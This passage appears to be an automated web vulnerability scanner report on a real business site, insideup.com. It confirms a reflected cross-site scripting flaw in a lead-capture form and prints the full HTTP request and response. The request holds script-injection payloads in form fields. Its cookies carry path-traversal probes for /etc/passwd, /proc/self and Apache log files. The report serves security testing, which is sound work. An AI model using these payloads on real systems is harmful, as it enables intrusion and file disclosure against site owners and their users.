type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <style>/* CSS Document */body{ line-height:18px; } #wrapper{ width:878px; margin:0 auto; padding-top:20px; } h11{ font:20px Verdana, Arial, Helvetica, sans-serif; margin:0px; padding:0px; } span.green{ color:#33a415; } h11 span.r{ font-size:14px; } h2{ font:bold 14px Verdana, Arial, Helvetica, sans-serif; color:#4f4f4f; margin:0px; padding:0; } h3{ font:bold 14px Verdana, Arial, Helvetica, sans-serif; color:#006cff; margin:0px; padding:0px; } h4{ font:bold 16px Verdana, Arial, Helvetica, sans-serif; color:#006cff; margin:0px; padding:0px; } .quote{ font:12px Verdana, Arial, Helvetica, sans-serif; line-height:20px; } .contentWrapper{ }/*--BOX BOX BOX--*/ .greyBox{ background:url(../images/box1.jpg) no-repeat left top #eeeeee; margin:15px 0; } .greyBox1{ background:url(../images/box2.jpg) no-repeat right top; } .greyBox2{ background:url(../images/box3.jpg) no-repeat right bottom; } .greyBox3{ background:url(../images/box4.jpg) no-repeat left bottom; padding:10px 15px; } .contactForm td{ padding:5px;}/*--BOX BOX BOX--*/ </style><div id="wrapper"><a class="secondaryAction" href="advertise.html" >Advertise</a> | <a class="secondaryAction" href="howitworks.html"> How It Works </a>|<a class="secondaryAction" style="margin-left:0;text-decoration:none;"><strong> Case Studies</strong> </a>|<a href="competitivecomparision.html" class="secondaryAction"> Competitive Comparison </a>|<a href="advertiserFAQs.html" class="secondaryAction"> Advertiser FAQs </a>|<a href="advertiserTerms.html" class="secondaryAction"> Advertiser Terms </a>|<a href="http://insideup.com/blogs/b2bleadgen" class="secondaryAction"> Marketing Blog </a>|<a href="marketingWhitepaper.html" class="secondaryAction"> Marketing Whitepaper </a><div class="contentWrapper"><table border="0" cellspacing="0" cellpadding="0"> <tr> <td scope="row" width="575"> <h11> <span style="font-size:15px;">TeleDirect Call Centers Case Study</span> |<a href="vocalocitycasestudy.html" style="font-size:15px;"> Vocalocity Voice Over IP Case Study</a> </h11> <br/><br/> <h2>The Leader in Call Center Services for Business Joins Forces with InsideUp to Dramatically Increase Sales Leads & Conversions</h2> <div> <div class="greyBox"> <div class="greyBox1"> <div class="greyBox2"> <div class="greyBox3"> <h3>InsideUp Client Overview</h3> TeleDirect Call Centers has been supporting the business community with outstanding call center services for 50 years and has grown into today's advanced, full-service provider of choice. TeleDirect employs more than 100 professional, courteous CSRs who present first-rate impressions for clients, and the firm deploys cutting-edge technology to handle any call volume. The firm has been on the Sacramento Business Journal's "Fastest Growing Companies" list for six consecutive years!</div> </div> </div> </div> </div> <img src="/images/partition_dash_bar.jpg" /> <img src="/images/tldr.jpg" alt="banner" border="0" usemap="#Map" /> <div class="quote"><span class="green">"</span>InsideUp far exceeded our expectations. InsideUp leads were not only qualified and verified..they were either warm or hot to the touch! Plus they were exactly the prospects that hit our sweet spot. Thanks to InsideUp, our business has grown significantly<span class="green">"</span> <strong style="color:#0066FF; display:block;">Tom Coshow, CEO TeleDirect</strong></div> <img src="/images/partition_dash_bar.jpg" /></td> <td valign="top" style=" padding-left:18px;"> <div style="padding:10px; background:#87baff; font:11px Verdana, Arial, Helvetica, sans-serif; line-height:18px;"> <form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="teledirectcasestudy"> <input type="hidden" name="parentPage" value="3"> <table class="contactForm" cellpadding="5"> <tr> <td colspan="2" class="head"><span style="color: #000; font-family: Arial,Helvetica,sans-serif; font-size: 17px; font-weight: bold; line-height:20px;">To get more information about becoming a marketing partner of InsideUp, complete and submit the form below:</span></td> </tr> <tr> <td width="108" style="width: 100px;">First Name</td> <td width="144" style="text-align: left;"> <input name="firstName" type="text" value="'"--></style></script><script>netsparker(0x001192)</script>"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="Smith"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="3"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="3"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="netsparker@example.com"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="3"> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td align="left" valign="top"> ..
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST 3
email POST netsparker@example.com
firstName POST Smith
lastName POST '"--></style></script><script>alert(0x0011A1)</script>
parentPage POST 3
phone POST 3
src POST teledirectcasestudy
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/teledirectcasestudy.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 229
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices=3&email=netsparker%40example.com&firstName=Smith&lastName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0011A1)%3c%2fscript%3e&parentPage=3&phone=3&src=teledirectcasestudy&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:39:29 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=DF1B49732D4CD1C2C6A011DEFDA70E59; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <style>/* CSS Document */body{ line-height:18px; } #wrapper{ width:878px; margin:0 auto; padding-top:20px; } h11{ font:20px Verdana, Arial, Helvetica, sans-serif; margin:0px; padding:0px; } span.green{ color:#33a415; } h11 span.r{ font-size:14px; } h2{ font:bold 14px Verdana, Arial, Helvetica, sans-serif; color:#4f4f4f; margin:0px; padding:0; } h3{ font:bold 14px Verdana, Arial, Helvetica, sans-serif; color:#006cff; margin:0px; padding:0px; } h4{ font:bold 16px Verdana, Arial, Helvetica, sans-serif; color:#006cff; margin:0px; padding:0px; } .quote{ font:12px Verdana, Arial, Helvetica, sans-serif; line-height:20px; } .contentWrapper{ }/*--BOX BOX BOX--*/ .greyBox{ background:url(../images/box1.jpg) no-repeat left top #eeeeee; margin:15px 0; } .greyBox1{ background:url(../images/box2.jpg) no-repeat right top; } .greyBox2{ background:url(../images/box3.jpg) no-repeat right bottom; } .greyBox3{ background:url(../images/box4.jpg) no-repeat left bottom; padding:10px 15px; } .contactForm td{ padding:5px;}/*--BOX BOX BOX--*/ </style><div id="wrapper"><a class="secondaryAction" href="advertise.html" >Advertise</a> | <a class="secondaryAction" href="howitworks.html"> How It Works </a>|<a class="secondaryAction" style="margin-left:0;text-decoration:none;"><strong> Case Studies</strong> </a>|<a href="competitivecomparision.html" class="secondaryAction"> Competitive Comparison </a>|<a href="advertiserFAQs.html" class="secondaryAction"> Advertiser FAQs </a>|<a href="advertiserTerms.html" class="secondaryAction"> Advertiser Terms </a>|<a href="http://insideup.com/blogs/b2bleadgen" class="secondaryAction"> Marketing Blog </a>|<a href="marketingWhitepaper.html" class="secondaryAction"> Marketing Whitepaper </a><div class="contentWrapper"><table border="0" cellspacing="0" cellpadding="0"> <tr> <td scope="row" width="575"> <h11> <span style="font-size:15px;">TeleDirect Call Centers Case Study</span> |<a href="vocalocitycasestudy.html" style="font-size:15px;"> Vocalocity Voice Over IP Case Study</a> </h11> <br/><br/> <h2>The Leader in Call Center Services for Business Joins Forces with InsideUp to Dramatically Increase Sales Leads & Conversions</h2> <div> <div class="greyBox"> <div class="greyBox1"> <div class="greyBox2"> <div class="greyBox3"> <h3>InsideUp Client Overview</h3> TeleDirect Call Centers has been supporting the business community with outstanding call center services for 50 years and has grown into today's advanced, full-service provider of choice. TeleDirect employs more than 100 professional, courteous CSRs who present first-rate impressions for clients, and the firm deploys cutting-edge technology to handle any call volume. The firm has been on the Sacramento Business Journal's "Fastest Growing Companies" list for six consecutive years!</div> </div> </div> </div> </div> <img src="/images/partition_dash_bar.jpg" /> <img src="/images/tldr.jpg" alt="banner" border="0" usemap="#Map" /> <div class="quote"><span class="green">"</span>InsideUp far exceeded our expectations. InsideUp leads were not only qualified and verified..they were either warm or hot to the touch! Plus they were exactly the prospects that hit our sweet spot. Thanks to InsideUp, our business has grown significantly<span class="green">"</span> <strong style="color:#0066FF; display:block;">Tom Coshow, CEO TeleDirect</strong></div> <img src="/images/partition_dash_bar.jpg" /></td> <td valign="top" style=" padding-left:18px;"> <div style="padding:10px; background:#87baff; font:11px Verdana, Arial, Helvetica, sans-serif; line-height:18px;"> <form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="teledirectcasestudy"> <input type="hidden" name="parentPage" value="3"> <table class="contactForm" cellpadding="5"> <tr> <td colspan="2" class="head"><span style="color: #000; font-family: Arial,Helvetica,sans-serif; font-size: 17px; font-weight: bold; line-height:20px;">To get more information about becoming a marketing partner of InsideUp, complete and submit the form below:</span></td> </tr> <tr> <td width="108" style="width: 100px;">First Name</td> <td width="144" style="text-align: left;"> <input name="firstName" type="text" value="Smith"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="'"--></style></script><script>netsparker(0x0011A1)</script>"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="3"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="3"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="netsparker@example.com"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="3"> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td align="left" valign="top"> ..
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST 3
email POST netsparker@example.com
firstName POST Smith
lastName POST Smith
parentPage POST '"--></style></script><script>alert(0x0011AF)</script>
phone POST 3
src POST teledirectcasestudy
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/teledirectcasestudy.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 